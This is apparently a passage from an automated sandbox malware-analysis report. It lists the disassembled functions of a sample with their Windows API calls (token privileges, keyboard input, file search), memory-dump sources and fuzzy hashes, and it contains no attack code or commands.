CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C1D608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00C1D645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00C1D650

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: 7beb529ef95f39678997048b1da962d680e6082fe214f1eb96c80f92e294a6bd
Instruction ID: fe6cc275fd8ec3c0823991baa0742ed57be63b18dbd8fba567aebbdacc1b8efc
Opcode Fuzzy Hash: 7beb529ef95f39678997048b1da962d680e6082fe214f1eb96c80f92e294a6bd
Instruction Fuzzy Hash: FE118E75E01228BFDB208F95DC84FEFBBBCEB46B60F108111F914E7290C2B05A018BA1

Function 00C11663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00C1168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00C116A1
FreeSid.ADVAPI32(?), ref: 00C116B1

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 424416e951ac1cd27fa36583e44c5bbcad241c6ca5fda8fcd175860d4afb9a3b
Instruction ID: b9158ec4a41c6a4a75cb0ac4c5d20e1b2db755b14cbdfbe72e695fd8a5c3a22e
Opcode Fuzzy Hash: 424416e951ac1cd27fa36583e44c5bbcad241c6ca5fda8fcd175860d4afb9a3b
Instruction Fuzzy Hash: 3DF04475A41308FBDB00CFE0CC89AAEBBBCFB08200F004860E900E2190E334AA448A50

Function 00BD4CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00BE28E9,?,00BD4CBE,00BE28E9,00C788B8,0000000C,00BD4E15,00BE28E9,00000002,00000000,?,00BE28E9), ref: 00BD4D09
TerminateProcess.KERNEL32(00000000,?,00BD4CBE,00BE28E9,00C788B8,0000000C,00BD4E15,00BE28E9,00000002,00000000,?,00BE28E9), ref: 00BD4D10
ExitProcess.KERNEL32 ref: 00BD4D22

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 72202a91fa76d955df75a8055d7793cba8590d5808edc35156cd940d0077ff5f
Instruction ID: 8eebb52858a3a9b7921cb328bc0f15b76a8f909abef51c582dc33b81d0cd11cc
Opcode Fuzzy Hash: 72202a91fa76d955df75a8055d7793cba8590d5808edc35156cd940d0077ff5f
Instruction Fuzzy Hash: 9BE0B635001188AFCF61AF64DD49B9C7BAAFB42791B144065FC058B232DB35DD42CB80

Function 00BEC2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

/, xrefs: 00BEC36C

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID:
String ID: /
API String ID: 0-2043925204
Opcode ID: ad91ad1f5af0c6cb7a1627070d6b497a4159ab287fae8ee7439c40e1b06ab751
Instruction ID: 17d368b21e3194d2b0f4ad314fd5c5044818a3e1ef8ab26fc489a6c4d14ebcda
Opcode Fuzzy Hash: ad91ad1f5af0c6cb7a1627070d6b497a4159ab287fae8ee7439c40e1b06ab751
Instruction Fuzzy Hash: 304129765002596FCB249FBACC89EBB7BF8EB84354F1042E9F915D7280E7709D828B54

Function 00C0D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00C0D28C

Strings

X64, xrefs: 00C0D2A8

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: f1fb3aa2d72a7d0d8c6986f363cc459d514679b69b2824abf6d609445d453751
Instruction ID: dbb1ceba4ba3d6041ea186c2373e4ab8f4754203d267381a8b7ed3ba81198d63
Opcode Fuzzy Hash: f1fb3aa2d72a7d0d8c6986f363cc459d514679b69b2824abf6d609445d453751
Instruction Fuzzy Hash: 20D0C9B880211DEBCB90CB90DCC8EDDB7BCBB04305F100195F106A2040D73095488F10

Function 00BDCAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: aed7b40f69b28664e3031fe8a2a5c3efcf62623ceea75bad6cb5ce5e230557ab
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: C6022D71E0011A9BDF14CFA9C9806ADFBF1EF48314F2582AAD919E7384E731AD45CB84

Function 00C268EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00C26918
FindClose.KERNEL32(00000000), ref: 00C26961

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 239260eaf503dd15cb0ea456e6483d01d67e550c7320be4730a2f55ae3a23971
Instruction ID: fe324fbaa950ca6cf01dd9f1195aecfb2c1d764eede6f6049238229004ed36c4
Opcode Fuzzy Hash: 239260eaf503dd15cb0ea456e6483d01d67e550c7320be4730a2f55ae3a23971
Instruction Fuzzy Hash: 5D1190356046109FC710DF2AD485A2ABBE5FF85328F14C699F4698F7A2CB70EC45CBA1

Function 00C237B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00C34891,?,?,00000035,?), ref: 00C237E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00C34891,?,?,00000035,?), ref: 00C237F4

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 8d7f335517b53240d3cb4fefa586eb194504209c9636ccfca9eadbee3315dd36
Instruction ID: e11a23ce7d80de39b42114467fe9e1802691bee1bc7d8437e645e56a76911e57
Opcode Fuzzy Hash: 8d7f335517b53240d3cb4fefa586eb194504209c9636ccfca9eadbee3315dd36
Instruction Fuzzy Hash: D3F0EC746052286BDB6017665C8DFEF3A9DEFC5B61F000165F505D21D1D5A05944C6B0

Function 00C1B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00C1B25D
keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 00C1B270

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: ee9cd76912904c08c472872cc4e773c2f20e5ecdb836cbba6681a54f2aa5ccfd
Instruction ID: 23a58bc829eb006d3e76882d8c8bcf23a7ded2c859cb92ecede1b3ffa1f559be
Opcode Fuzzy Hash: ee9cd76912904c08c472872cc4e773c2f20e5ecdb836cbba6681a54f2aa5ccfd
Instruction Fuzzy Hash: B1F06D7480424EABDB058FA0C805BEE7BB0FF05305F008009F961A51A2C37986059F94

Function 00C110BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C111FC), ref: 00C110D4
CloseHandle.KERNEL32(?,?,00C111FC), ref: 00C110E9

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: eb601caf220096586e610c3c5d337a38e64fda64089a18c875f611d02e42f22e
Instruction ID: 1efc9ce4b84ba045d72dc36065d8a2c6313a071e71ce48d477e1bdd02b9f5f33
Opcode Fuzzy Hash: eb601caf220096586e610c3c5d337a38e64fda64089a18c875f611d02e42f22e
Instruction Fuzzy Hash: 15E04F32005611AEE7252B11FC05FB777E9FB05320B14886DF5A6804B1DB626C90DB10

Function 00BBCAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON

Download Yara Rule

Strings

Variable is not of type 'Object'., xrefs: 00C00C40

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.
API String ID: 0-1840281001
Opcode ID: 0b0cd019d9b0f7b20db4d9d7ee8ac1dc708532aa5d8f94a8210b49cc466bff20
Instruction ID: b2e5ab7ae2cf59c6dd8fe709085b0bd8f81fbf516b584e33bc3d67828818eb5a
Opcode Fuzzy Hash: 0b0cd019d9b0f7b20db4d9d7ee8ac1dc708532aa5d8f94a8210b49cc466bff20
Instruction Fuzzy Hash: 7B3247749002189BDF14DF90C895BFDBBF5FF05304F2440A9E816AB292D7B5AE49CB61

Function 00BE676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00BE6766,?,?,00000008,?,?,00BEFEFE,00000000), ref: 00BE6998

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: a0f781a3ae65a4293d553ed2fba2cea10a923cbace9ddf12028def2c5314d4ee
Instruction ID: ad28eeff11b98ce35cd0b9c970c89d731711209353838953ab4efad5873f237d
Opcode Fuzzy Hash: a0f781a3ae65a4293d553ed2fba2cea10a923cbace9ddf12028def2c5314d4ee
Instruction Fuzzy Hash: D2B16B35610648DFD719CF29C48AB657BE0FF153A4F25C699E89ACF2A2C335E981CB40

Function 00BCB119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON

Download Yara Rule

Strings

, xrefs: 00C0851F

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 06aa025718ef20e7a31950f455dc30920259b0cef196914ea1cb5ef031291230
Instruction ID: b1c28e584a184727e6403c69cd12f26be66c378bb114f8ab961c4dfbfa6832d5
Opcode Fuzzy Hash: 06aa025718ef20e7a31950f455dc30920259b0cef196914ea1cb5ef031291230
Instruction Fuzzy Hash: FF124F759002299BDB24CF58C881BEEB7F5FF48710F14819AE849EB295DB309E85CF90

Function 00C2EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 00C2EABD

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: bc5123775933517ad18b995a1a7604cfbe0780abd30eb02b202254ff83ba1e86
Instruction ID: 228c94796f56c712027270858fd6a0fa39a592590dc296380d73c7e657c1be27
Opcode Fuzzy Hash: bc5123775933517ad18b995a1a7604cfbe0780abd30eb02b202254ff83ba1e86
Instruction Fuzzy Hash: ADE012352102149FC710EF59D454E9ABBE9AF69760F00845AFC49D7251D6B0E8408B91

Function 00BD09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00BD03EE), ref: 00BD09DA

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 00b6c5e4cbcc72b81b109f071d99a2c5ce801cf7f5421c57191e0c9937331713
Instruction ID: 8a9dc058d32108de3f7b16ae0f30eba50d98cbf8abaf9784493dd6d8daa9629d
Opcode Fuzzy Hash: 00b6c5e4cbcc72b81b109f071d99a2c5ce801cf7f5421c57191e0c9937331713
Instruction Fuzzy Hash:

Function 00BD781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 00BD798B

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction ID: e35f7b1dac1c9f016bb0ab6b49f3d39bde6e511407c8a06dfa5064055076acf4
Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
Instruction Fuzzy Hash: E25137726CC6456ADB38852A48ADBFEE7D5DB02300F1805CBD886C7382FE1ADE01E355

Function 00BE6DD9 Relevance: .6, Instructions: 637COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c55a63223dc1f34b4e98d68fd8ffe293eb184768b7f0c8e63f16c5487e86f5cb
Instruction ID: cffa514df5c9b916a7003fbcc72b226757e63fd68f6c44a1e92f57e8b4ec84b8
Opcode Fuzzy Hash: c55a63223dc1f34b4e98d68fd8ffe293eb184768b7f0c8e63f16c5487e86f5cb
Instruction Fuzzy Hash: 67322326D69F414DD7239635D822339A2D9EFB73C6F24C727E81AB5AA5EF29C4C34100

Function 00BCCC39 Relevance: .6, Instructions: 635COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3f06cb89b90d499f15dbd3d84718b088e9f3ba9d4fd4d812b9b3db44aa3942de
Instruction ID: e7a1978babbc8bc9ec4b07f66a929ecca2c577afb561f3ab7ba0d4b8d4bcb59c
Opcode Fuzzy Hash: 3f06cb89b90d499f15dbd3d84718b088e9f3ba9d4fd4d812b9b3db44aa3942de
Instruction Fuzzy Hash: 3A32F731A041558BDF24CF29C4D4B7E7BE1EB55310F28866AE4AEDB2D2D234DE81EB41

Function 00BB7920 Relevance: .6, Instructions: 563COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7204ee794b2b6a97b3992ed0dfb19e1f5d3fda0cc9cf3ae40f89cfd792766fe7
Instruction ID: 082fbf802f00662479a3b57ce7b6efaf702fe22ea355a22b6c16295a93cb3903
Opcode Fuzzy Hash: 7204ee794b2b6a97b3992ed0dfb19e1f5d3fda0cc9cf3ae40f89cfd792766fe7
Instruction Fuzzy Hash: B822A070A0460A9FDF24CF68C881BFEB7F6FF44300F2045A9E916A7291EB75A955CB50

Function 00BB91C0 Relevance: .5, Instructions: 475COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1306421430.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000001.00000002.1306397532.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C4C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306494255.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306563363.0000000000C7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1306584283.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_bb0000_6mllsKaB2q.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc6568c7fd2842e4b9065f363b9f8285c0005a8409f5f0712b928b3dbfec8020
Instruction ID: b16bf70c5e16731d38ef8ca5e43f7ce672041dc1c15243fc8d8dc9b2b499c2aa
Opcode Fuzzy Hash: dc6568c7fd2842e4b9065f363b9f8285c0005a8409f5f0712b928b3dbfec8020
Instruction Fuzzy Hash: 4202A6B0E0020AEBDB04DF54D881BBDB7F1FF44300F1081A9E9169B2A1E771EA55DB91

Function 00BD1C77 Relevance: .3, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

